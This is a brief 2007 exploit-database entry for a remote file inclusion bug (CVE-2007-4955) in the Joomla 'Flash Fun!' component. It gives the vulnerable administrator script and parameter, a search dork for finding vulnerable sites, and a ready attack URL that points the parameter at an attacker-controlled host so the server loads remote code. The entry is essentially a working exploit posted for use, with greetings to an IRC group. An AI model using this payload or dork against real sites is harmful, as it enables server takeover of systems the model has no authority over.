Joomla! Component flash fun! 1.0 - Remote File Inclusion
| EKU-ID: 12370 | CVE: OSVDB-37139;CVE-2007-4955 | OSVDB-ID: |
| Author: Morgan | Published: 2007-09-15 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 12370 | CVE: OSVDB-37139;CVE-2007-4955 | OSVDB-ID: |
| Author: Morgan | Published: 2007-09-15 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
###################################### # Joomla Flash Fun! Component RFI # ###################################### Bug in : /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site= Variable : $mosConfig_live_site Dork: "com_joomlaflashfun" Example: http://xxx.net/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=[attacker] Greets to all Irc.RealWorm.Net #Morgan Users ;) # milw0rm.com [2007-09-15]